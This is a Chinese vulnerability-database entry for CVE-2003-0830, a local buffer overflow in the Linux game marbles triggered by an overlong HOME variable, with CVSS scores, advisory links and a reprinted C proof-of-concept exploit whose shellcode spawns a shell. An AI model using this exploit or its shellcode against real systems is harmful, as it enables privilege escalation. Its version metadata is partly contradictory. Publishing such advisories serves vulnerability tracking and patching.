CVE-2003-0830
CVSS4.6
发布时间 :2003-11-17 00:00:00
修订时间 :2008-09-10 15:20:35
NMCOES    

[原文]Buffer overflow in marbles 1.0.2 and earlier allows local users to gain privileges via a long HOME environment variable.


[CNNVD]marbles本地环境变量缓冲区溢出漏洞(CNNVD-200311-083)

        
        marbles是一款Linux下的游戏程序。
        marbles程序在处理环境变量时缺少正确的缓冲区边界检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以以'game'组权限在系统上执行任意指令。
        问题是Marbles在处理HOME环境变量时缺少充分边界检查,攻击者提交超长HOME环境变量数据,可以以'game'组权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 4.6 [中等(MEDIUM)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0830
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0830
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200311-083
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2003/dsa-390
(VENDOR_ADVISORY)  DEBIAN  DSA-390

- 漏洞信息

marbles本地环境变量缓冲区溢出漏洞
中危 边界条件错误
2003-11-17 00:00:00 2005-10-20 00:00:00
本地  
        
        marbles是一款Linux下的游戏程序。
        marbles程序在处理环境变量时缺少正确的缓冲区边界检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击,可以以'game'组权限在系统上执行任意指令。
        问题是Marbles在处理HOME环境变量时缺少充分边界检查,攻击者提交超长HOME环境变量数据,可以以'game'组权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-390

- 漏洞信息 (23189)

marbles 1.0.1 Local Home Environment Variable Buffer Overflow Vulnerability (EDBID:23189)
linux local
2003-09-26 Verified
0 demz
N/A [点击下载]
source: http://www.securityfocus.com/bid/8710/info

A problem in the handling of data in the Home environment variable has been reported in the marbles program. This may make it possible for a local attacker to gain elevated privileges. 

/* c-marbles.c
 *
 * PoC exploit made for advisory based uppon an local stack based overflow.
 * Vulnerable versions, maybe also prior versions:
 *
 * Marbles v1.0.5
 *
 * Tested on:  Redhat 9.0
 *
 * Advisory source: Steve Kemp
 * http://www.debian.org/security/2003/dsa-390
 *
 * ---------------------------------------------
 * coded by: demz (c-code.net) (demz@c-code.net)
 * ---------------------------------------------
 *
 */

#include <stdio.h>
#include <stdlib.h>

char shellcode[]=

        "\x31\xc0"                      // xor          eax, eax
        "\x31\xdb"                      // xor          ebx, ebx
        "\x31\xc9"                      // xor          ecx, ecx
        "\xb0\x46"                      // mov          al, 70
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\x50"                          // push         eax
        "\x68\x6e\x2f\x73\x68"          // push  long   0x68732f6e
        "\x68\x2f\x2f\x62\x69"          // push  long   0x69622f2f
        "\x89\xe3"                      // mov          ebx, esp
        "\x50"                          // push         eax
        "\x53"                          // push         ebx
        "\x89\xe1"                      // mov          ecx, esp
        "\x99"                          // cdq
        "\xb0\x0b"                      // mov          al, 11
        "\xcd\x80"                      // int          0x80

        "\x31\xc0"                      // xor          eax, eax
        "\xb0\x01"                      // mov          al, 1
        "\xcd\x80";                     // int          0x80

int main()
{
        unsigned long ret = 0xbffff70c;

        char buffer[3988];
        int i=0;

        memset(buffer, 0x90, sizeof(buffer));

        for (0; i < strlen(shellcode) - 1;i++)
        buffer[2000 + i] = shellcode[i];

        buffer[3988] = (ret & 0x000000ff);
        buffer[3989] = (ret & 0x0000ff00) >> 8;
        buffer[3990] = (ret & 0x00ff0000) >> 16;
        buffer[3991] = (ret & 0xff000000) >> 24;
        buffer[3992] = 0x0;

        printf("\nMarbles v1.0.5 local exploit\n");
        printf("---------------------------------------- demz @ c-code.net --\n");

        setenv("HOME", buffer, 1);

        execl("/usr/local/bin/marbles", "marbles", NULL);
}
		

- 漏洞信息

11707
marbles HOME Environment Variable Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

Unknown or Incomplete

- 时间线

2003-09-26 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

marbles Local Home Environment Variable Buffer Overflow Vulnerability
Boundary Condition Error 8710
No Yes
2003-09-26 12:00:00 2009-07-11 11:56:00
Discovery credited to Steve Kemp.

- 受影响的程序版本

marbles marbles 1.0.1
marbles marbles 1.0.2

- 不受影响的程序版本

marbles marbles 1.0.2

- 漏洞讨论

A problem in the handling of data in the Home environment variable has been reported in the marbles program. This may make it possible for a local attacker to gain elevated privileges.

- 漏洞利用

Exploit code has been developed:

- 解决方案

Debian has released advisory DSA 390-1. See referenced advisory for fix information and additional details.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站